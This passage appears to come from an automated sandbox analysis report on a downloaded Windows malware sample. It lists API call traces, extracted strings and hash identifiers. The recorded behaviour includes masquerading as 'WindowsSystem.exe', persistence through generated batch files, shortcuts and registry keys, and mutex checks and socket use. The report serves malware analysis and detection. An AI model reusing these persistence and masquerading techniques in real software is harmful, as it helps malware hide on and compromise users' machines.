                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030C267
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C2B2
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C2E6
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030C31C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C32C
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 0030C353
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C379
                                                                                                            • lstrcpyW.KERNEL32(00000000,{9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}), ref: 0030C39E
                                                                                                            • CoInitializeEx.COMBASE(00000000,00000006), ref: 0030C405
                                                                                                            • ShellExecuteExW.SHELL32(<@@), ref: 0030C418
                                                                                                            • GetLastError.KERNEL32 ref: 0030C424
                                                                                                            • CoUninitialize.COMBASE ref: 0030C439
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C47A
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030C4B5
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030C4FC
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C51D
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C539
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030C546
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C553
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C560
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C574
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C590
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030C59D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5AA
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5B7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5C4
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5D1
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030C5DD
                                                                                                            • closesocket.WS2_32(?), ref: 0030C5E7
                                                                                                              • Part of subcall function 0030B6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B70C
                                                                                                              • Part of subcall function 0030B6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                              • Part of subcall function 0030B6D0: __snwprintf.LIBCMT ref: 0030B74E
                                                                                                              • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B77C
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AllocEvent$CreateErrorLast$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileInitializeProcessShellUninitialize__snwprintfclosesocketsetsockoptshutdown
                                                                                                            • String ID: "%s%s" %s$%s%s$<@@$@@$D$H53$WindowsSystem.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 3249679174-591112596
                                                                                                            • Opcode ID: 61aca38f473fb02afe666feea531d00f59a02081ae7a9064a34c795051403864
                                                                                                            • Instruction ID: 034b3252cec2858f38c4d698ed2a84fae16158468daebab288d6bba520923e68
                                                                                                            • Opcode Fuzzy Hash: 61aca38f473fb02afe666feea531d00f59a02081ae7a9064a34c795051403864
                                                                                                            • Instruction Fuzzy Hash: 45A13AB5910218DFEB36DBA4DC59BADBB78BF48301F0085A9E60DA7290DB745AC4CF50
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,00316AFB), ref: 003122DD
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 003122FD
                                                                                                            • __snwprintf.LIBCMT ref: 00312322
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000BB8), ref: 0031234F
                                                                                                            • __snprintf.LIBCMT ref: 0031237E
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00312396
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003123AB
                                                                                                            • __snwprintf.LIBCMT ref: 003123D5
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 003123E3
                                                                                                            • GetLastError.KERNEL32 ref: 003123F2
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031240A
                                                                                                            • __snwprintf.LIBCMT ref: 00312439
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0031245B
                                                                                                            • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 00312487
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00312499
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124C3
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003124CD
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003124D7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124E1
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124EB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124F5
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0031250C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312516
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312520
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0031252A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312534
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031253E
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00312548
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312552
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$AllocTask$__snwprintf$FolderKnownPathlstrlen$CloseCreateFileHandle$DirectoryErrorLastWrite__snprintf
                                                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.bat$@echo offcmd /c start "" "%S%S" %S$WindowsSystem.exe${18925F49-C14F-4A5B-BA0F-9C4106DA4CB0}${34E50511-FBB8-42F8-98A2-2629192A03A0}${9771290C-19FB-4434-8B1F-8952BA10F287}${A786AA22-8EF1-44CE-8698-6F3988CB643E}
                                                                                                            • API String ID: 2364451356-46602529
                                                                                                            • Opcode ID: 283382d6433c60010dc16610899b8523cc1b9ef441da1fa062674b45a8a1f916
                                                                                                            • Instruction ID: 0ef30adfa3466ce0f47fbc22f22966fb0eb835594f79f240700b3e97774a3ef2
                                                                                                            • Opcode Fuzzy Hash: 283382d6433c60010dc16610899b8523cc1b9ef441da1fa062674b45a8a1f916
                                                                                                            • Instruction Fuzzy Hash: 5E715EB5E40205EBDB26DBA4DC8AFEEBB79AF4C710F108518F605B62D0D7749980CB60
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 0031FFFF
                                                                                                            • WSACreateEvent.WS2_32 ref: 00320015
                                                                                                            • shutdown.WS2_32(000000FF,00000002), ref: 003204D0
                                                                                                            • closesocket.WS2_32(000000FF), ref: 003204DA
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEventclosesocketshutdownsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3702629066-0
                                                                                                            • Opcode ID: 15924345f88df42b2d5bca7cf895c3a439c203bc900b76e6cea17a0fb3e695ba
                                                                                                            • Instruction ID: 7329269bfac8f817bc818e98a68f32684539a175966eacd0543fb073676c4cdf
                                                                                                            • Opcode Fuzzy Hash: 15924345f88df42b2d5bca7cf895c3a439c203bc900b76e6cea17a0fb3e695ba
                                                                                                            • Instruction Fuzzy Hash: 4AF15074900228EFDF29DFA4E888BEDB7B9FF48310F208559E519A7251D7349A84DF50
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00304C50
                                                                                                            • _memset.LIBCMT ref: 00304C6F
                                                                                                            • _memset.LIBCMT ref: 00304C8E
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00304CAF
                                                                                                            • __snwprintf.LIBCMT ref: 00304CD8
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00304CE7
                                                                                                            • _memset.LIBCMT ref: 00304D06
                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00304D1A
                                                                                                            • __snwprintf.LIBCMT ref: 00304D3C
                                                                                                            • __snwprintf.LIBCMT ref: 00304D7C
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00304D8D
                                                                                                            • GetLastError.KERNEL32 ref: 00304D99
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00304DCF
                                                                                                            • __snwprintf.LIBCMT ref: 00304DF6
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00304E17
                                                                                                            • GetLastError.KERNEL32 ref: 00304E2C
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __snwprintf_memset$CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$D$Open
                                                                                                            • API String ID: 37154465-2887319354
                                                                                                            • Opcode ID: b57003a8b69f40df5e6a721865c528d55f97e894fcd6fecc8a21cea3b1bbae5a
                                                                                                            • Instruction ID: ceb247dfef0921ea2a49ce56cf872340aebff7ab17b9c9912c23038a1e7a45f6
                                                                                                            • Opcode Fuzzy Hash: b57003a8b69f40df5e6a721865c528d55f97e894fcd6fecc8a21cea3b1bbae5a
                                                                                                            • Instruction Fuzzy Hash: 70A176B1A10318ABDB25DB60DC89FDA7779AF98704F004598F60DAA1C1EB749BC4CF91
                                                                                                            APIs
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 0030BE96
                                                                                                              • Part of subcall function 00301C80: CreateEventW.KERNEL32(00000000,00000001,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00301CA2
                                                                                                              • Part of subcall function 00301C80: _memset.LIBCMT ref: 00301CCC
                                                                                                              • Part of subcall function 00301C80: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00301CE0
                                                                                                              • Part of subcall function 00301C80: _memset.LIBCMT ref: 00301D05
                                                                                                              • Part of subcall function 00301C80: __snwprintf.LIBCMT ref: 00301D2F
                                                                                                              • Part of subcall function 00301C80: _memset.LIBCMT ref: 00301D70
                                                                                                              • Part of subcall function 00301C80: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00301D84
                                                                                                              • Part of subcall function 00301C80: LocalAlloc.KERNEL32(00000040,00000DF0), ref: 00301DA3
                                                                                                              • Part of subcall function 00301C80: GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00301DC1
                                                                                                              • Part of subcall function 00301C80: GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00301DD9
                                                                                                              • Part of subcall function 00301C80: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00301DF3
                                                                                                              • Part of subcall function 00301C80: lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 00301E14
                                                                                                              • Part of subcall function 00301C80: lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00301E2B
                                                                                                              • Part of subcall function 00301C80: lstrcpyW.KERNEL32(-00000648,00000000), ref: 00301E42
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030BF0A
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030BF5C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BF90
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030BFC6
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C019
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C035
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030C042
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C04F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C05C
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030C068
                                                                                                            • closesocket.WS2_32(?), ref: 0030C072
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventLocal$_memsetlstrcpy$AddressAllocDirectoryFreeHandleProcWow64$CloseCreateCurrentDisableModuleOpenRedirectionWindows__snwprintfclosesocketsetsockoptshutdownwnsprintf
                                                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsSystem.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 535781040-2280803059
                                                                                                            • Opcode ID: 3d2c04497036cc5447225c36f04bbc28f299c374c1232b59eca25933a64b0735
                                                                                                            • Instruction ID: ef908b84d178b960eb5a1a6961d95c12744039f96b095d4bdd6d58a5394823ea
                                                                                                            • Opcode Fuzzy Hash: 3d2c04497036cc5447225c36f04bbc28f299c374c1232b59eca25933a64b0735
                                                                                                            • Instruction Fuzzy Hash: E2915CB5A10218EFDB36DBA4DC59BADB778BF48300F1041A8F60DA6291D7749AC4CF11
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00309811
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 0030982C
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 0030983B
                                                                                                            • _memset.LIBCMT ref: 0030985D
                                                                                                            • __snwprintf.LIBCMT ref: 0030987B
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 003098AA
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 003098DA
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 00309915
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocLocalValue$__snwprintf_memsetlstrcpy
                                                                                                            • String ID: (Z6$.DLL$SOFTWARE\%s$rT=${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 2286648044-2150405501
                                                                                                            • Opcode ID: 136e8dd978d9e6093687f022c2c9196b6c2fe3f906700273efeaf930750b9381
                                                                                                            • Instruction ID: 3e9f45c1e1ec63c6d96890ce2774413aa6eaf0614f77e0a5fb9988463864c194
                                                                                                            • Opcode Fuzzy Hash: 136e8dd978d9e6093687f022c2c9196b6c2fe3f906700273efeaf930750b9381
                                                                                                            • Instruction Fuzzy Hash: 64D15974E012189FDB25DB64DC9DBAAB7B8AF88300F1085D9E50DAB291DB709E80CF51
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00308D3E
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00308D59
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 00308D68
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00308D8D
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 00308DA6
                                                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 00308DBF
                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 00308DE4
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00308DFA
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                                                            • String ID: (Z6$.DLL$rT=
                                                                                                            • API String ID: 2968648924-93524146
                                                                                                            • Opcode ID: 7b38cf283f6a8524713e1b0b8a6138d205d73e999f094a423d2d44c0a230da1a
                                                                                                            • Instruction ID: a761c7f38a10abc072bd103fa445f7f7332da028819c37c92df63433c9a6a9e2
                                                                                                            • Opcode Fuzzy Hash: 7b38cf283f6a8524713e1b0b8a6138d205d73e999f094a423d2d44c0a230da1a
                                                                                                            • Instruction Fuzzy Hash: CEC14C75E01208EBDB29DFE4DC99BEEBB79BF48300F108529E615AB290C7359981CF50
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00307603
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 00307813
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0030783A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030785B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307868
                                                                                                            • __snwprintf.LIBCMT ref: 0030789D
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 003078B8
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 00307910
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00307937
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307958
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307965
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 0030799A
                                                                                                            • _memset.LIBCMT ref: 003079D5
                                                                                                            • __snwprintf.LIBCMT ref: 003079F3
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 00307A15
                                                                                                            • RegDeleteValueW.ADVAPI32(?,00000000), ref: 00307A2D
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00307A4D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307A5A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307A67
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 00307AA0
                                                                                                            • closesocket.WS2_32(?), ref: 00307AAA
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Delete$AllocFileInfoLocale___crt__snwprintfwnsprintf$CloseOpenValue_memsetclosesocketsetsockoptshutdown
                                                                                                            • String ID: $#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 421061684-1784904374
                                                                                                            • Opcode ID: 78575592498caaf7cce90d6c60e05bf29cb055c747ba4ed46b29bb7b34bd7d7b
                                                                                                            • Instruction ID: 51e16ddfcead1329c20b175efdca8543a824193857501041640a9bb32f80eee0
                                                                                                            • Opcode Fuzzy Hash: 78575592498caaf7cce90d6c60e05bf29cb055c747ba4ed46b29bb7b34bd7d7b
                                                                                                            • Instruction Fuzzy Hash: 74D117B1D002299BEB25DF50CC89BEEB7B8BF44304F10C5D9E549AB281DB759A84DF90
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00307B13
                                                                                                            • _memset.LIBCMT ref: 00307BA4
                                                                                                            • __snwprintf.LIBCMT ref: 00307BC2
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 00307BEC
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00307C80
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00308096
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003080AC
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003080C2
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003080D8
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 003080F7
                                                                                                            • closesocket.WS2_32(?), ref: 00308101
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$InfoLocale___crt$AllocCloseCreate__snwprintf_memsetclosesocketsetsockoptshutdown
                                                                                                            • String ID: SOFTWARE\%s$rT=${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 1227969885-643280724
                                                                                                            • Opcode ID: e6ee4b68e6b2117bf2746ff0a23a19ae02172fe0611ab9b8ed62ac8d63a1634a
                                                                                                            • Instruction ID: 021e827a25a24898b8dcd811ab1af9794fab9b4df43316b7843908155e710e09
                                                                                                            • Opcode Fuzzy Hash: e6ee4b68e6b2117bf2746ff0a23a19ae02172fe0611ab9b8ed62ac8d63a1634a
                                                                                                            • Instruction Fuzzy Hash: AB025CB0D01219EBEB36CB54CC59BAAB778BF48310F108298E659A72C1DB715EC5CF61
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 0031BB32
                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0031BB42
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031BB59
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0031BB7D
                                                                                                            • ExitProcess.KERNEL32 ref: 0031BE75
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316BFC
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C14
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C2A
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C3F
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C57
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C6D
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C82
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C98
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CB0
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316CC5
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316CDB
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316CF3
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D08
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316D1E
